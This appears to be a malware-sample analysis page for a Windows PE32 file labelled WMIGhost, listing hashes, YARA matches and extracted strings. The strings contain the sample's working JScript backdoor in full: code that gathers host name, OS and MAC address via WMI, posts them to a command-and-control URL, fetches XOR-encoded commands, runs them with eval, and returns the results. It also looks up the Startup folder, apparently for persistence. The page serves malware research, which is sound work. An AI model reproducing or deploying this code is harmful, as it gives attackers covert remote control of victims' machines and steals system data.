Sample details: 460b288a581cdeb5f831d102cb6d198b --

Hashes
MD5: 460b288a581cdeb5f831d102cb6d198b
SHA1: a2614a8ffd58857822396a2740cf70a8424c5c3e
SHA256: 01259a104a0199b794b0c61fcfc657eb766b2caeae68d5c6b164a53a97874257
SSDEEP: 384:r6EWkcIvuAHzo7ZkpqwlUxmoY1y4gUvDkQ9:3wRtkjl+moCyFUvt9
Details
File Type: PE32
Yara Hits
YRP/Armadillo_v171 | YRP/Microsoft_Visual_Cpp_v60 | YRP/Microsoft_Visual_Cpp_v50v60_MFC_additional | YRP/Microsoft_Visual_Cpp_50 | YRP/Microsoft_Visual_Cpp_v50v60_MFC | YRP/Armadillo_v171_additional | YRP/Microsoft_Visual_Cpp | YRP/IsPE32 | YRP/IsWindowsGUI | YRP/HasRichSignature | YRP/domain | YRP/IP | YRP/url | YRP/contentis_base64 | YRP/win_files_operation | YRP/android_meterpreter | FlorianRoth/DragonFly_APT_Sep17_3 |
Source
http://94.130.104.170/01259a104a0199b794b0c61fcfc657eb766b2caeae68d5c6b164a53a97874257
http://94.130.104.170/WMIGhost//01259a104a0199b794b0c61fcfc657eb766b2caeae68d5c6b164a53a97874257
http://94.130.104.170/WMIGhost/01259a104a0199b794b0c61fcfc657eb766b2caeae68d5c6b164a53a97874257
Strings
		!This program cannot be run in DOS mode.
`.rdata
@.data
GetFileAttributesA
MultiByteToWideChar
InterlockedDecrement
WideCharToMultiByte
WaitForSingleObject
CreateProcessA
MoveFileA
DeleteFileA
GetTempPathA
GetModuleFileNameA
WinExec
GetTempFileNameA
MoveFileExA
CopyFileA
FindClose
FindFirstFileA
KERNEL32.dll
SHGetSpecialFolderPathA
SHELL32.dll
CoInitialize
CoCreateInstance
OleRun
ole32.dll
OLEAUT32.dll
??0Init@ios_base@std@@QAE@XZ
??1Init@ios_base@std@@QAE@XZ
??0_Winit@std@@QAE@XZ
??1_Winit@std@@QAE@XZ
MSVCP60.dll
??2@YAPAXI@Z
__CxxFrameHandler
memcpy
memset
_beginthread
sprintf
malloc
strcat
strcpy
fclose
fprintf
strstr
strlen
strcmp
_CxxThrowException
__dllonexit
_onexit
MSVCRT.dll
_XcptFilter
_acmdln
__getmainargs
_initterm
__setusermatherr
_adjust_fdiv
__p__commode
__p__fmode
__set_app_type
_except_handler3
??1type_info@@UAE@XZ
_controlfp
GetLastError
lstrlenA
LocalFree
GetModuleHandleA
GetStartupInfoA
JScript
http://192.168.66.184/sosblogs.xml
http://192.168.66.184/sosblogs.xml
http://192.168.66.184/sosblogs.xml
var MAIN=function(sXmlUrl,sURLParam){$=this;$.sXmlUrl=sXmlUrl;$.sURLParam=sURLParam;$._x=ActiveXObject;$.oWMI=GetObject('winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\cimv2');$.oShell=new $._x('WScript.Shell');$.oStream=new $._x('ADODB.Stream');$.oHttp=new $._x('Microsoft.XmlHttp');};MAIN.prototype={Decode:function(sourceStr){var keycode=sourceStr.charCodeAt(0);var source=sourceStr.substr(1);var vals=source.split(',');var result='';for(var i=0;i<vals.length;i++){result+=String.fromCharCode(vals[i]^keycode);}return result;},MainLoop:function(){var oXml=new $._x('MSXML2.DOMDocument.3.0');var response='';var commandresult='';try{$.oHttp.Open('POST',$.sXmlUrl,false);$.oHttp.setRequestHeader('CONTENT-TYPE','application/x-www-form-urlencoded');$.oHttp.Send($.sURLParam);response=$.oHttp.ResponseText.replace(/(^\s*)|(\s*$)/g,'');}catch(e){}if(response.length>0){var commands=null;var container;try{oXml.loadXML(response);container=oXml.getElementsByTagName('div');for(var i=0;i<container.length;i++){if(container[i].getAttribute('id')=='0a552b5a4352'){commands=eval('('+container[i].text+')').command;}}}catch(e){}if(commands!=null){for(var i=0;i<commands.length;i++){var result='no response';try{result=eval($.Decode(commands[i].value));}catch(e){}if(i>0){commandresult+=',';}commandresult+='\''+commands[i].id+'\':\''+escape(result)+'\'';}if(commandresult.length>0){commandresult='{'+commandresult+'}';$.oHttp.Open('POST',$.sXmlUrl,false);$.oHttp.setRequestHeader('CONTENT-TYPE','application/x-www-form-urlencoded');$.oHttp.Send($.sURLParam+'&command=result&commandresult='+commandresult);}}return'1';}return'0';},Fire:function(){try{return $.MainLoop();}catch(e){}}};
function circleDecode(sc){var base=sc.charCodeAt(0);var s=base-32;var r='';for(var i=1;i<sc.length;i++){var nc=sc.charCodeAt(i)-s-i+1;if(nc<32){nc=126+(nc-32)%94;}r+=String.fromCharCode(nc);}return r;};function getUrl(url){var oHttp=new ActiveXObject('WinHttp.WinHttpRequest.5.1');oHttp.Open('GET',url,false);oHttp.setRequestHeader('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; rv:1.9.1) Gecko/20130530 Firefox/3.5');oHttp.Send();oHttp.waitForResponse(30000);return (((((oHttp.ResponseText.replace(/(^\s*)|(\s*$)/g,'')).match('<title>@(.*)@</title>'))[0]).match('@(.*)@'))[1]).replace(/&amp;/g,'&').replace(/&quot;/g, '\"');};function getPHPUrl(s){return circleDecode(getUrl(s));};
function getsURLParam(sOwner){var sOSType;var sHostName;var sMacAddress=null;var sURLParam=null;var version='8.6.1520';var oWMI=GetObject('winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\cimv2');var e=new Enumerator(oWMI.ExecQuery('Select * from Win32_OperatingSystem'));if(!e.atEnd()){var item=e.item();sOSType=escape(item.Caption)+item.ServicePackMajorVersion;sHostName=item.CSName;}e=new Enumerator(oWMI.ExecQuery('Select * from Win32_NetworkAdapter where PNPDeviceID like \"%PCI%\" and NetConnectionStatus=2'));if(!e.atEnd()){sMacAddress=e.item().MACAddress;}var time=new Date();sURLParam='cstype=server&authname=servername&authpass=serverpass&hostname='+sHostName+'&ostype='+sOSType+'&macaddr='+sMacAddress+'&owner='+sOwner+'&version='+version;sURLParam+='&t='+time.getMinutes()+time.getSeconds();return sURLParam;};
function ShellFolder(){var oShell=new ActiveXObject('WScript.Shell');return oShell.regread("HKLM\\software\\microsoft\\windows\\currentVersion\\Explorer\\Shell Folders\\Common Startup")};
\TPAutoConn.exe
\TPAutoConn.exe
Perfdata_2b0.js
\cscript.exe 
getPHPUrl('%s');
http://
getsURLParam('%s');
new MAIN('%s','%s').Fire();
ShellFolder();
.?AV_com_error@@
.?AVtype_info@@